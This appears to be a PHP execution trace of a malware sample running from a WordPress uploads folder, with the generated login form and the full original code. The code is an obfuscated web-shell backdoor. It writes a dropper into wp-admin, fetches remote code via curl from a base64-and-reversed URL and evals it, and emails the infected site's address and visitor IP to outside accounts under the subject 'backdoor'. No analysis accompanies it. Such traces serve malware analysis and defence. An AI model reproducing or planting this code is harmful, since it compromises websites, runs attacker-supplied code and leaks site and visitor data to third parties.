3	64	0	0.143928	971520	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA=='
3	64	1	0.143944	971616
3	64	R			'/wp-admin/maint/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$mbjpypwb7b20acdddd89 = '/var/www/html/wp-admin/maint/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$ytdsowai3effc6913c18 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	65	0	0.143993	971584	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	65	1	0.144007	971648
3	65	R			'w'
3	66	0	0.144020	971616	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-admin/maint/regid.php'	'w'
3	66	1	0.144048	971688
3	66	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$uwadmcgaf32639c3fc76 = FALSE
3	67	0	0.144073	971584	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	67	1	0.144117	971648
3	67	R			FALSE
3	68	0	0.144136	971584	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	68	1	0.144155	971616
3	68	R			FALSE
3	69	0	0.144168	971584	error_reporting	0		/var/www/html/uploads/netss.php(1) : eval()'d code	3	1	1
3	69	1	0.144182	971624
3	69	R			0
3	70	0	0.144195	971584	ini_set	0		/var/www/html/uploads/netss.php(1) : eval()'d code	4	2	'display_errors'	'Off'
3	70	1	0.144211	971656
3	70	R			''
3	71	0	0.144224	971584	ini_set	0		/var/www/html/uploads/netss.php(1) : eval()'d code	5	2	'max_execution_time'	10000
3	71	1	0.144241	971720
3	71	R			'30'
3	72	0	0.144254	971616	header	0		/var/www/html/uploads/netss.php(1) : eval()'d code	6	1	'content-Type: text/html; charset=UTF-8'
3	72	1	0.144271	971792
3	72	R			NULL
3	73	0	0.144285	971760	strdir	1		/var/www/html/uploads/netss.php(1) : eval()'d code	18	1	'/var/www/html/uploads/netss.php'
4	74	0	0.144299	971760	chop	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	1	'/var/www/html/uploads/netss.php'
4	74	1	0.144312	971792
4	74	R			'/var/www/html/uploads/netss.php'
4	75	0	0.144326	971760	str_replace	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	3	[0 => '\\', 1 => '//', 2 => '%27', 3 => '%22']	[0 => '/', 1 => '/', 2 => '\'', 3 => '"']	'/var/www/html/uploads/netss.php'
4	75	1	0.144348	971856
4	75	R			'/var/www/html/uploads/netss.php'
3	73	1	0.144364	971760
3	73	R			'/var/www/html/uploads/netss.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	18	$myfile = '/var/www/html/uploads/netss.php'
3	76	0	0.144390	971760	strpos	0		/var/www/html/uploads/netss.php(1) : eval()'d code	19	2	'/var/www/html/uploads/netss.php'	'eval()'
3	76	1	0.144404	971832
3	76	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	19	$myfile = '/var/www/html/uploads/netss.php'
3	77	0	0.144428	971760	dirname	0		/var/www/html/uploads/netss.php(1) : eval()'d code	20	1	'/var/www/html/uploads/netss.php'
3	77	1	0.144442	971848
3	77	R			'/var/www/html/uploads'
3	78	0	0.144457	971808	strdir	1		/var/www/html/uploads/netss.php(1) : eval()'d code	20	1	'/var/www/html/uploads/'
4	79	0	0.144470	971808	chop	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	1	'/var/www/html/uploads/'
4	79	1	0.144482	971840
4	79	R			'/var/www/html/uploads/'
4	80	0	0.144496	971808	str_replace	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	3	[0 => '\\', 1 => '//', 2 => '%27', 3 => '%22']	[0 => '/', 1 => '/', 2 => '\'', 3 => '"']	'/var/www/html/uploads/'
4	80	1	0.144517	971904
4	80	R			'/var/www/html/uploads/'
3	78	1	0.144531	971808
3	78	R			'/var/www/html/uploads/'
3	81	0	0.144544	971808	define	0		/var/www/html/uploads/netss.php(1) : eval()'d code	20	2	'THISDIR'	'/var/www/html/uploads/'
3	81	1	0.144559	971912
3	81	R			TRUE
3	82	0	0.144572	971840	strdir	1		/var/www/html/uploads/netss.php(1) : eval()'d code	21	1	'/uploads/netss.php'
4	83	0	0.144586	971840	chop	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	1	'/uploads/netss.php'
4	83	1	0.144599	971872
4	83	R			'/uploads/netss.php'
4	84	0	0.144613	971840	str_replace	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	3	[0 => '\\', 1 => '//', 2 => '%27', 3 => '%22']	[0 => '/', 1 => '/', 2 => '\'', 3 => '"']	'/uploads/netss.php'
4	84	1	0.144632	971936
4	84	R			'/uploads/netss.php'
3	82	1	0.144647	971840
3	82	R			'/uploads/netss.php'
3	85	0	0.144660	972216	strtr	0		/var/www/html/uploads/netss.php(1) : eval()'d code	21	2	'/var/www/html/uploads/netss.php'	['/uploads/netss.php' => '']
3	85	1	0.144675	972320
3	85	R			'/var/www/html'
3	86	0	0.144690	971880	strdir	1		/var/www/html/uploads/netss.php(1) : eval()'d code	21	1	'/var/www/html/'
4	87	0	0.144703	971880	chop	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	1	'/var/www/html/'
4	87	1	0.144716	971912
4	87	R			'/var/www/html/'
4	88	0	0.144729	971880	str_replace	0		/var/www/html/uploads/netss.php(1) : eval()'d code	9	3	[0 => '\\', 1 => '//', 2 => '%27', 3 => '%22']	[0 => '/', 1 => '/', 2 => '\'', 3 => '"']	'/var/www/html/'
4	88	1	0.144749	971976
4	88	R			'/var/www/html/'
3	86	1	0.144762	971880
3	86	R			'/var/www/html/'
3	89	0	0.144775	971880	define	0		/var/www/html/uploads/netss.php(1) : eval()'d code	21	2	'ROOTDIR'	'/var/www/html/'
3	89	1	0.144790	971984
3	89	R			TRUE
3	90	0	0.144803	971912	getinfo	1		/var/www/html/uploads/netss.php(1) : eval()'d code	22	0
4	91	0	0.144818	972312	function_exists	0		/var/www/html/uploads/netss.php(1) : eval()'d code	378	1	'phpinfo'
4	91	1	0.144835	972352
4	91	R			TRUE
3		A						/var/www/html/uploads/netss.php(1) : eval()'d code	378	$infos = [0 => NULL, 1 => '531e70a6745d07a8befbd79e5cc7e4c1', 2 => TRUE, 3 => '127.0.0.1']
4	92	0	0.144868	972312	md5	0		/var/www/html/uploads/netss.php(1) : eval()'d code	379	1	NULL
4	92	1	0.144883	972408
4	92	R			'd41d8cd98f00b204e9800998ecf8427e'
			0.145591	891920
TRACE END   [2023-02-12 21:38:15.617235]


Generated HTML code

<html><head></head><body><center><form method="POST"><input type="password" name="getpwd"> <input type="submit" value="Go"></form></center></body></html>

Original PHP code

<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?><?php ${"\x47\x4cO\x42\x41\x4c\x53"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]="t\x75j\x75a\x6em\x61i\x6c";${"\x47L\x4fB\x41\x4cS"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]="x\x5fp\x61\x74h";${"\x47L\x4f\x42A\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]="_\x53E\x52\x56\x45R";${"G\x4cO\x42\x41\x4c\x53"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]="p\x65\x73\x61n\x5fa\x6c\x65r\x74";@ini_set('output_buffering',0);@ini_set('display_errors',0);set_time_limit(0);ini_set('memory_limit','64M');header('Content-Type: text/html; charset=UTF-8');${${"G\x4cO\x42A\x4cS"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]}="l\x6fg\x6ed\x61s\x6du\x40g\x6da\x69\x6c.\x63\x6fm\x2c\x20n\x64a\x73\x6d\x75\x77\x68y\x40y\x61\x68o\x6f.\x63\x6f\x6d";${${"G\x4cO\x42A\x4cS"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]}="\x68t\x74p\x3a/\x2f".${${"G\x4c\x4f\x42\x41L\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['SERVER_NAME'].${${"\x47\x4c\x4f\x42A\x4cS"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REQUEST_URI'];${${"\x47L\x4fB\x41\x4cS"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]}="\x66\x69\x78\x20${${"\x47\x4cO\x42\x41L\x53"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]}\x20\x3a\x70\x20\x2a\x49\x50\x20\x41\x64\x64\x72\x65\x73\x73\x20\x3a\x20\x5b\x20".${${"G\x4c\x4fB\x41\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REMOTE_ADDR']."\x20\x5d";mail(${${"G\x4c\x4f\x42\x41L\x53"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]},"backdoor",${${"G\x4c\x4fB\x41\x4cS"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]},"[ ".${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REMOTE_ADDR']." \x5d"); ?>